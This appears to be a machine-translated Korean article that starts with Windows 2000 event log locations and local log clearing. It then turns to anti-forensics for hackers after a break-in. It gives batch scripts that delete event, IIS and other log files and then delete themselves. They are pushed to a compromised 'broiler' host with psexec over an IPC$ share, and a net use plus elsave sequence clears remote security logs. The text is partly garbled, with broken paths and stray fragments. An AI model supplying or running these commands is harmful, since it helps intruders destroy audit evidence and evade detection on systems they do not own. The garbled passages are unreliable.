이벤트 뷰어 코드는 무엇을 의미하나요?

1. 로그 파일의 위치

Windows 2000의 시스템 로그 파일에는 응용 프로그램 로그, 보안 로그, 시스템 로그, DNS 서버 로그 등이 포함되며 응용 프로그램 로그, 보안 로그, 시스템 로그 및 DNS 로그의 기본 위치는 systemrootsystem32config입니다.

보안 로그 파일: systemrootsystem32configSecEvent.EVT

시스템 로그 파일: systemrootsystem32configSysEvent.EVT

응용 프로그램 로그 파일: systemrootsystem32configAppEvent.EVT

일부 관리자는 이러한 로그를 재배치할 수 있습니다(로그가 위 위치에 없을 수 있음). EVENTLOG 아래에는 위 로그의 위치 디렉터리를 찾을 수 있는 하위 테이블이 많이 있습니다.

2. 컴퓨터에서 로그 지우기

컴퓨터에서 로그를 지우려면 Windows에 관리자로 로그인한 후 "제어판"에 입력하면 됩니다. " "관리 도구"를 클릭하고 내부의 "이벤트 뷰어"를 두 번 클릭하세요. 연 후 여기에서 애플리케이션, 보안 및 시스템 로그 파일을 포함하는 로그 파일을 지울 수 있습니다. 예를 들어, 보안 로그를 지우고 싶다면 "보안 로그"를 마우스 오른쪽 버튼으로 클릭하고 팝업 메뉴에서 "속성"을 선택하면 됩니다. 그런 다음 팝업 대화 상자에서 아래의 "로그 지우기" 버튼을 클릭하여 나중에 이러한 로그를 지우려면 "필요에 따라 크기 다시 쓰기"를 변경하면 됩니다. 최대 로그 크기에 도달하면 이벤트가 다시 작성되는 경우 로그를 지우라는 메시지가 표시되지 않습니다.

3. 원격 호스트의 로그 지우기

대부분의 경우 IIS 로그는 수신된 모든 요청을 충실하게 기록합니다(IIS에 기록되지 않는 특수 공격도 있습니다). , 훌륭한 시스템 관리자는 침입 시도를 탐지하고 시스템을 보호하기 위해 이를 사용할 것입니다. 따라서 해커라면 시스템 침입에 성공한 후 가장 먼저 하는 일은 로그를 지우고 흔적을 지우는 것입니다. 이때 다음 두 가지 방법을 사용할 수 있습니다. 먼저 배치 파일을 직접 작성하여 문제를 해결합니다. 문제를 해결하고 로그를 지울 수 있는 프로그램을 작성합니다. 방법은 다음과 같습니다.

@del c:winntsystem32logfiles*.*

@del c:winntsystem32config*.evt

p>

@del c：winntsystem32dtclog*.*

@del c：winntsystem32*.log

@del c：winntsystem32*.txt

@del c：winnt*.txt

@del c：winnt*.log

@ del c：del.bat

위 내용을 del.bat 백업으로 저장하세요. 위 코드에서 echo는 DOS에서의 echo 명령입니다. 앞에 "@" 접두사 문자를 추가하면 이 줄은 실행 중에 명령줄이나 DOS에 표시되지 않습니다. del 명령 맞죠? 파일 삭제 명령입니다.

다음으로 다음 내용으로 새 배치 파일을 만듭니다.

@copy del.bat ＼1c$

@echo 로컬 del을 브로일러에 복사합니다. .bat......OK

@psexec ＼1 c：del.bat

@echo 브로일러에서 del.bat를 실행하고 로그 파일을 삭제합니다.... ..OK

broiler와 IPC 연결을 만들었다고 가정하고 CMD 아래에 clean.bat broiler IP를 입력하여 broiler의 로그 파일을 지웁니다.

로그를 지우는 또 다른 방법은 시스템 로그, 애플리케이션 로그 및 보안을 원격으로 지울 수 있는 유명한 해커 소프트웨어 스트리머의 개발자인 해커 Xiaorong의 elsave.exe와 같은 타사 소프트웨어를 사용하는 것입니다. 로그 소프트웨어는 온라인으로 다운로드할 수 있습니다. elsave.exe는 사용이 매우 간단합니다. 먼저 획득한 관리자 계정을 사용하여 상대방과 IPC 세션을 설정합니다. net use ＼ip pass /user: user 그런 다음 명령줄에서 다음 명령을 실행합니다. elsave -s ＼ip -l application -C 보안로그를 삭제합니다.